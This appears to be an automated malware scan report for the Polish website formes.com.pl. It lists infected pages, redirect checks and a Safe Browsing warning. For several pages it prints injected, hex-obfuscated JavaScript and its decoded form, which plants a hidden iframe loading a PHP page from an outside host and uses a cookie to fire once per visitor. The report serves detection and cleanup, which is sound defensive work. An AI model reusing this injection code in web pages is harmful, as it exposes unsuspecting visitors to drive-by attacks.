Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=formes.com.pl
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://formes.com.pl/ | 200 OK Content-Length: 7395 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="74837c7182777d7c2e88888874747436372e89182e846f802e8075872e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b7335374918182e8075873c8180712e4b2e357682827e483d3d8585853c797d79826f7c3c71883d777b6f75733d8860597c65867f523c7e767e3549182e8075873c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a8382733549182e8075873c8182877a733c707d807273802e4b2e353e3549182e8075873c8182877a733c7673777576822e4b2e Decoded script: String String function zzzfff() { var rgy = document.createElement('iframe'); rgy.src = 'http://www.koktan.cz/image/zRKnWxqD.php'; rgy.style.position = 'absolute'; rgy.style.border = '0'; rgy.style.height = '9px'; rgy.style.width = '7px'; rgy.style.left = '1px'; rgy.style.top = '1px'; if (!document.getElementById('rgy')) { document.write('<div id=\'rgy\'></div>'); document.getElementById('rgy').appendChild(rgy); if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://formes.com.pl/indexe.html | 200 OK Content-Length: 9339 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="74837c7182777d7c2e88888874747436372e89182e846f802e8075872e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b7335374918182e8075873c8180712e4b2e357682827e483d3d8585853c797d79826f7c3c71883d777b6f75733d8860597c65867f523c7e767e3549182e8075873c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a8382733549182e8075873c8182877a733c707d807273802e4b2e353e3549182e8075873c8182877a733c7673777576822e4b2e Decoded script: String String function zzzfff() { var rgy = document.createElement('iframe'); rgy.src = 'http://www.koktan.cz/image/zRKnWxqD.php'; rgy.style.position = 'absolute'; rgy.style.border = '0'; rgy.style.height = '9px'; rgy.style.width = '7px'; rgy.style.left = '1px'; rgy.style.top = '1px'; if (!document.getElementById('rgy')) { document.write('<div id=\'rgy\'></div>'); document.getElementById('rgy').appendChild(rgy); if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://formes.com.pl/firmae.html | 200 OK Content-Length: 12368 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="74837c7182777d7c2e88888874747436372e89182e846f802e8075872e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b7335374918182e8075873c8180712e4b2e357682827e483d3d8585853c797d79826f7c3c71883d777b6f75733d8860597c65867f523c7e767e3549182e8075873c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a8382733549182e8075873c8182877a733c707d807273802e4b2e353e3549182e8075873c8182877a733c7673777576822e4b2e Decoded script: String String function zzzfff() { var rgy = document.createElement('iframe'); rgy.src = 'http://www.koktan.cz/image/zRKnWxqD.php'; rgy.style.position = 'absolute'; rgy.style.border = '0'; rgy.style.height = '9px'; rgy.style.width = '7px'; rgy.style.left = '1px'; rgy.style.top = '1px'; if (!document.getElementById('rgy')) { document.write('<div id=\'rgy\'></div>'); document.getElementById('rgy').appendChild(rgy); if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://formes.com.pl/javas.js | 200 OK Content-Length: 4097 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="74837c7182777d7c2e88888874747436372e89182e846f802e797173702e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b7335374918182e797173703c8180712e4b2e357682827e483d3d8585853c797d79826f7c3c71883d777b6f75733d8860597c65867f523c7e767e3549182e797173703c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a8382733549182e797173703c8182877a733c707d807273802e4b2e353e3549182e797173703c8182877a733c76737775 Decoded script: String String function zzzfff() { var kceb = document.createElement('iframe'); kceb.src = 'http://www.koktan.cz/image/zRKnWxqD.php'; kceb.style.position = 'absolute'; kceb.style.border = '0'; kceb.style.height = '9px'; kceb.style.width = '7px'; kceb.style.left = '1px'; kceb.style.top = '1px'; if (!document.getElementById('kceb')) { document.write('<div id=\'kceb\'></div>'); document.getElementById('kceb').appendChild if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://formes.com.pl/ofertae.html | 200 OK Content-Length: 10141 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="74837c7182777d7c2e88888874747436372e89182e846f802e8075872e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b7335374918182e8075873c8180712e4b2e357682827e483d3d8585853c797d79826f7c3c71883d777b6f75733d8860597c65867f523c7e767e3549182e8075873c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a8382733549182e8075873c8182877a733c707d807273802e4b2e353e3549182e8075873c8182877a733c7673777576822e4b2e Decoded script: String String function zzzfff() { var rgy = document.createElement('iframe'); rgy.src = 'http://www.koktan.cz/image/zRKnWxqD.php'; rgy.style.position = 'absolute'; rgy.style.border = '0'; rgy.style.height = '9px'; rgy.style.width = '7px'; rgy.style.left = '1px'; rgy.style.top = '1px'; if (!document.getElementById('rgy')) { document.write('<div id=\'rgy\'></div>'); document.getElementById('rgy').appendChild(rgy); if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://formes.com.pl/kontakte.php | 200 OK Content-Length: 7288 Content-Type: text/html | clean |
http://formes.com.pl/towary_en.php?page=n | 200 OK Content-Length: 9463 Content-Type: text/html | clean |
http://formes.com.pl/towary_en.php?page=n&sr=linia&ident=297&category=16 | 200 OK Content-Length: 9463 Content-Type: text/html | clean |
http://formes.com.pl/towary_en.php?page=n&sr=linia&ident=284&category=36 | 200 OK Content-Length: 9463 Content-Type: text/html | clean |
http://formes.com.pl/towary_en.php?page=n&sr=linia&ident=285&category=36 | 200 OK Content-Length: 9463 Content-Type: text/html | clean |
http://formes.com.pl/towary_en.php?page=n&sr=linia&ident=286&category=36 | 200 OK Content-Length: 9463 Content-Type: text/html | clean |
http://formes.com.pl/towary_en.php?page=n&sr=linia&ident=287&category=36 | 200 OK Content-Length: 9463 Content-Type: text/html | clean |
http://formes.com.pl/towary_en.php?page=n&sr=linia&ident=288&category=36 | 200 OK Content-Length: 9463 Content-Type: text/html | clean |
http://formes.com.pl/towary_en.php?page=n&sr=linia&ident=289&category=36 | 200 OK Content-Length: 9463 Content-Type: text/html | clean |
http://formes.com.pl/towary_en.php?page=n&sr=linia&ident=290&category=36 | 200 OK Content-Length: 9463 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: formes.com.pl
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 14:09:15 GMT
Server: IdeaWebServer/v0.80
Content-Length: 7395
Content-Type: text/html
Last-Modified: Thu, 08 Aug 2013 02:30:37 GMT
...7395 bytes of data.
GET / HTTP/1.1
Host: formes.com.pl
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 14:09:15 GMT
Server: IdeaWebServer/v0.80
Content-Length: 7395
Content-Type: text/html
Last-Modified: Thu, 08 Aug 2013 02:30:37 GMT
...7395 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: formes.com.pl
Referer: http://www.google.com/search?q=formes.com.pl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: formes.com.pl
Referer: http://www.google.com/search?q=formes.com.pl
Result:
The result is similar to the first query. There are no suspicious redirects found.